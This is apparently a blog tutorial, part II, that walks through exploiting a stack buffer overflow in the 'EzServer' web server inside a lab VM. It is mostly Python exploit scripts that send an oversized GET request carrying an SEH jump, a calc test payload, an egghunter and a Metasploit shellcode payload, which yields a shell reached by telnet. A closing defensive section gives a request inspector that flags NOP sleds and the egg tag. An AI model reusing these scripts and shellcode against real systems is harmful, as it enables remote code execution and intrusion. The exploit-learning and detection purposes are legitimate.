Wednesday, 03 October 2012

EzServer PART II

In the last post I did not get as far as step C, because there was a problem with the stack calculation. OK, let's go over it again.

1. We did not finish the "telnet" step; here is the solution.
Edit our fuzzing file "fuzzereasy.py" so that it becomes:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"

buffer+="\x90" * (5954-len(buffer))
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()


and run the fuzzer "fuzzerserver.py".

2. To check whether the calculation is correct or not, we use "calc" (the Windows calculator).
Open a browser, go to "127.0.0.1:55555", choose the Windows "execute command" payload, and fill in the dialog box as in the picture below.

Then click "generate payload"; this is the result:


Then edit our fuzzer file so that it becomes:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * (5954-len(buffer))
buffer+=("\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5"
"\xde\x82\x48\x83\xeb\xfc\xe2\xf4\x49\x36\xc6\x48\xb5\xde\x09\x0d"
"\x89\x55\xfe\x4d\xcd\xdf\x6d\xc3\xfa\xc6\x09\x17\x95\xdf\x69\x01"
"\x3e\xea\x09\x49\x5b\xef\x42\xd1\x19\x5a\x42\x3c\xb2\x1f\x48\x45"
"\xb4\x1c\x69\xbc\x8e\x8a\xa6\x4c\xc0\x3b\x09\x17\x91\xdf\x69\x2e"
"\x3e\xd2\xc9\xc3\xea\xc2\x83\xa3\x3e\xc2\x09\x49\x5e\x57\xde\x6c"
"\xb1\x1d\xb3\x88\xd1\x55\xc2\x78\x30\x1e\xfa\x44\x3e\x9e\x8e\xc3"
"\xc5\xc2\x2f\xc3\xdd\xd6\x69\x41\x3e\x5e\x32\x48\xb5\xde\x09\x20"
"\x89\x81\xb3\xbe\xd5\x88\x0b\xb0\x36\x1e\xf9\x18\xdd\x2e\x08\x4c"
"\xea\xb6\x1a\xb6\x3f\xd0\xd5\xb7\x52\xbd\xe3\x24\xd6\xde\x82\x48")
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()

Run EzServer without OllyDbg attached, and run the fuzzer.

EzServer running, before fuzzing:

and after fuzzing:

If the calculator appears, the offset value is correct.

3. Finally, build the egghunter and edit the fuzzer file.
Generate the payload from the Metasploit Framework, then copy the resulting payload into the fuzzing file, which becomes:

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
#buffer="\x90" * 5879
buffer="\x90" * 5457


hunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")


payload = ("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")



buffer+= "w00tw00t"
buffer+= payload
buffer+= "\x90" * 70
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x96\x96\x20\x10"
buffer+= "\x90" * 16
buffer+= hunt
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()

Run EzServer.

And this is the result:

Fuzz from the terminal:
type "telnet ip_target port_target".
The picture above shows that we have managed to exploit it.
Alhamdulillah.
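From the defender's side, the three scripts above all send the same shape of request: a GET whose request-target is thousands of bytes long, filled with 0x90 bytes, with the CRLF pair arriving before the HTTP version, and (in step 3) carrying the "w00tw00t" egg tag. The following inspector is an added example, not code from the post; it parses a raw request line and reports those traits over a few constructed samples. The length limit, the 32-byte NOP-run threshold and the non-printable ratio are assumptions chosen for illustration.

```python
#!/usr/bin/env python3
# Added example (not part of the original post): a small request-line
# inspector that flags the shapes of HTTP request the walkthrough sends,
# so a defender can recognise them in captured traffic or server logs.
import re

MAX_TARGET_LEN = 2048                      # assumption: generous limit for normal request-targets
NOP_RUN_RE = re.compile(rb"\x90{32,}")     # 32+ consecutive 0x90 bytes (a NOP sled)
EGG_TAGS = (b"w00tw00t",)                  # egghunter tag used in the post
BINARY_RATIO = 0.5                         # assumption: more than half non-printable is suspicious


def parse_request_line(raw):
    """Return (method, target, version) from the first line of a raw request.

    version is None when the line does not end in an HTTP/x.y token, which is
    what happens when the CRLF pair arrives before the version string (as in
    the post's scripts).  Returns None if the line has no request-target at all.
    """
    first_line = raw.split(b"\r\n", 1)[0]
    parts = first_line.split(b" ")
    if len(parts) < 2:
        return None
    method = parts[0]
    if len(parts) >= 3 and parts[-1].startswith(b"HTTP/"):
        return method, b" ".join(parts[1:-1]), parts[-1]
    return method, b" ".join(parts[1:]), None


def inspect_request(raw):
    """Return a list of finding strings (empty for a normal-looking request)."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return ["malformed-request-line"]
    method, target, version = parsed
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append("oversized-target:%d" % len(target))
    non_printable = sum(1 for b in target if b < 0x20 or b > 0x7E)
    if target and non_printable / len(target) > BINARY_RATIO:
        findings.append("binary-target")
    if NOP_RUN_RE.search(raw):
        findings.append("nop-sled")
    for tag in EGG_TAGS:
        if tag in raw:
            findings.append("egg-tag:" + tag.decode("ascii"))
    if version is None:
        findings.append("missing-version")
    return findings


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "benign": b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
    # same shape as the post's commented-out "\x41" * 6000 fuzz line
    "oversized": b"GET /" + b"A" * 6000 + b"\r\n\r\n" + b"HTTP/1.1",
    "nop_sled": b"GET /" + b"\x90" * 64 + b" HTTP/1.1\r\n\r\n",
    "egg_tag": b"GET /w00tw00t HTTP/1.1\r\n\r\n",
}


def scan_samples(samples=SAMPLES):
    """Run the inspector over every sample and return {name: findings}."""
    return {name: inspect_request(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print("%-10s %s" % (name, ", ".join(findings) or "clean"))
```

Run it directly to see one line per sample; the benign request is reported clean, the 6000-byte one is flagged as oversized and missing its version token, the 0x90-filled one as binary with a NOP run, and the last one by its egg tag. The same traits are what a length limit on the request line (the real fix for a server like this) or a network signature would key on.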